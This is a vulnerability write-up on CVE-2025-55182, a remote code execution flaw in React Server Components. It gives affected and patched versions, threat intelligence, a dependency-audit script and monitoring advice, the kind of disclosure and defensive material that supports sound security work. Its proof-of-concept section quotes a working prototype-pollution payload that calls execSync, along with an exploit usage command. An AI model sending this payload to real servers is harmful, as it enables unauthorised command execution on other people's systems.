CVE-2025-55182 - React to Shell (RCE)
Overview
CVE-2025-55182, also known as React2Shell, is a critical unauthenticated Remote Code Execution (RCE) vulnerability in React Server Components (RSC). Disclosed on December 3, 2025, it affects popular frameworks like Next.js.
The vulnerability allows an attacker to execute arbitrary code with the privileges of the web server process by sending a single, specially crafted HTTP request.
- CVSS Score: 10.0 (Critical)
- Vector: Unauthenticated network / RCE
Affected Versions
The following versions of React Server Components are vulnerable:
- react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Exploitation Mechanism
The vulnerability stems from insecure handling of serialized data in React Server Components. Attackers can leverage Prototype Pollution within the RSC environment to overwrite internal properties.
By targeting specific "thenable" objects and polluting the prototype chain, an attacker can redirect the execution flow to a dangerous sink, such as child_process.execSync (in Node.js environments).
Key Payload Components:
- Prototype Pollution: Overwriting `__proto__.then` or similar internal hooks.
- Sink Injection: Using `process.mainModule.require('child_process').execSync` to execute system commands.
- Response Redirection: Often combined with a `NEXT_REDIRECT` error to leak the command output via URL parameters or headers.
Proof of Concept (PoC)
Below is an analysis of the exploit script provided by surajhacx.
Exploit Script (exploit.py)

```python
# Excerpt from the surajhacx/react2shellpoc PoC
# Injection logic focus:
# (sanitize_command and the multipart/form-data assembly are defined
#  elsewhere in the full script and are not reproduced in this excerpt)
def build_exploit_payload(command):
    safe_cmd = sanitize_command(command)
    injection = (
        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
        '"value":"{\\\\\"then\\\\\":\\\\\"$B1337\\\\\"}\",\"_response\":{\"_prefix\":'
        f'\"var res=process.mainModule.require(\\'child_process\\').execSync(\\'{safe_cmd}\\')'
        '.toString().trim().replace(/\\\\\\\\n/g, \\' | \\');;throw Object.assign(new Error(\\'NEXT_REDIRECT\\'),'
        '{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",'
        '\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}'
    )
    # ... multipart/form-data assembly ...
```

Usage

```
python3 exploit.py -u http://target-app.com -c "id"
```

Threat Intelligence (Real-world Exploitation)
Google Threat Intelligence Group (GTIG) and other security firms have observed widespread exploitation by various threat actors:
| Threat Actor | Payload / Malware | Behavior |
|---|---|---|
| UNC6600 (China-nexus) | MINOCAT | ELF tunneler using Fast Reverse Proxy (FRP). |
| UNC6586 (China-nexus) | SNOWLIGHT | Go-based downloader masquerading as legitimate files. |
| UNC6588 | COMPOOD | Backdoor masquerading as Vim. |
| UNC6603 | HISONIC | Go-based implant using Cloudflare/GitLab for config. |
| Cybercriminals | XMRig | Deployment of cryptocurrency miners. |
Remediation
1. Patch Immediately
Update react-server-dom-* packages to one of the following versions (or later):
- 19.0.1
- 19.1.2
- 19.2.1
- 19.2.2 (Fixes follow-on information disclosure CVE-2025-55183)
- 19.2.3 (Fixes follow-on DoS CVE-2025-55184 / CVE-2025-67779)
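A dependency audit for the affected packages, as an added example that is not part of this advisory or of the React project: it checks every react-server-dom-* entry in a parsed package-lock.json against the first fixed release of each 19.x line listed above (19.0.1, 19.1.2, 19.2.1). The lockfile layout handled (the `packages` map of lockfileVersion 2/3), the version-parsing rule and the sample lockfile are assumptions.

```python
AFFECTED_PACKAGES = {"react-server-dom-webpack", "react-server-dom-parcel",
                     "react-server-dom-turbopack"}
# First fixed patch release per 19.x minor line, as listed in the advisory
# (19.2.2 and 19.2.3 fix the follow-on CVEs and are also past the fix).
FIXED_MINIMUM = {(19, 0): (19, 0, 1), (19, 1): (19, 1, 2), (19, 2): (19, 2, 1)}

def parse_version(version):
    """'MAJOR.MINOR.PATCH' -> int tuple; pre-release/build suffixes are
    dropped (assumption: such builds are compared by their core version)."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    return tuple(int(p) for p in core.split(".")[:3])

def is_vulnerable(name, version):
    """True when name/version lies inside a vulnerable 19.x range."""
    if name not in AFFECTED_PACKAGES:
        return False
    v = parse_version(version)
    fixed = FIXED_MINIMUM.get(v[:2])
    if fixed is None:
        return False  # not a 19.0/19.1/19.2 line, so outside the affected list
    return v < fixed

def audit_lockfile(lock):
    """Walk the 'packages' map of a parsed package-lock.json (lockfileVersion 2/3)
    and return (path, name, version) for every vulnerable react-server-dom-* copy,
    including nested ones under another package's node_modules."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version", "")
        if version and is_vulnerable(name, version):
            findings.append((path, name, version))
    return findings

# Constructed sample lockfile fragment (not from a real project).
SAMPLE_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "demo-app"},
    "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
    "node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
    "node_modules/next/node_modules/react-server-dom-parsel".replace("parsel", "parcel"): {"version": "19.1.1"},
    "node_modules/react": {"version": "19.2.0"},
}}

if __name__ == "__main__":
    for path, name, version in audit_lockfile(SAMPLE_LOCK):
        print(f"VULNERABLE {name}@{version} at {path}")
```

Nested copies matter because a framework may pin its own react-server-dom-* version under its node_modules, so a top-level upgrade alone does not prove the tree is clean.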
2. WAF Rules
Deploy Web Application Firewall (WAF) rules to detect and block RSC-specific injection attempts. Google Cloud Armor, AWS WAF, and others have released specific rules for CVE-2025-55182.
3. Monitoring
- Audit dependencies for vulnerable RSC packages.
- Monitor for suspicious child processes initiated by the web server (e.g., `curl`, `wget`, `sh`, `bash`).
- Look for IOCs like hidden directories (`$HOME/.systemd-utils`) or unauthorized cron jobs.